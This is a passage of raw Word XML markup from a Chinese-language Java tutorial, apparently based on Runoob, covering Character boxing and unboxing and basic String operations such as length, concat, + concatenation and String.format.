      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类对象，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26598889" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D7BFF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Character ch = new Character('a');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB6808" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6002A876" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器会自动创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105A17D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30112475" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，将一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的参数传递给需要一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型参数的方法时，那么编译器会自动地将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型参数转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种特征称为装箱，反过来称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>拆箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB07380" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384BA48E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原始字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'a' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装箱到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Character </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4B81F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character ch = 'a';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48639C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47225C85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原始字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'x' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法装箱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44361B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回拆箱的值到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC70D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char c = test('x');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1C970" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9A5A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.runoob.com/manual/jdk11api/java.base/java/lang/Character.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54DAF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="738" w:name="_Toc159780167"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
    </w:p>
    <w:p w14:paraId="4460699A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String str = "Runoob";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0242B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String str2=new String("Runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03385CB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2448A853" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>字符串长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126E5093" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class StringDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D15C868" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String args[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B60FAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        String site = "www.runoob.com";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E844E24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int len = site.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B6A34E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println( "</w:t>
      </w:r>
      <w:r>
        <w:t>菜鸟教程网址长度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : " + len );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3B436" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C456364" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02E320" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CFF667" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类提供了连接两个字符串的方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C9499" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4DA0D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string1.concat(string2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49209AEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> string2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> string1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的新字符串。也可以对字符串常量使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> concat() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E40D68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E2EEB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的名字是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ".concat("Runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC3167" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更常用的是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'+'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作符来连接字符串，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75302E3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546A5C55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"Hello," + " runoob" + "!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F650D10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2CCAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10629C42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"Hello, runoob!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211452D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建格式化字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B97A7D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们知道输出格式化数字可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> printf() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> format() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640EAA6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类使用静态方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> format() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PrintStream </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD6188" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的静态方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> format() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能用来创建可复用的格式化字符串，而不仅仅是用于一次打印输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138365E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E89A3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20722221" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.out.printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>浮点型变量的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55940B27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                  "%f, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>整型变量的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7CB5BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                  " %d, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字符串变量的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A548340" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                  "is %s", floatVar, intVar, stringVar);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C108E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你也可以这样写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653FD69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String fs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D9F94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fs = String.format("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>浮点型变量的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544FC2F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
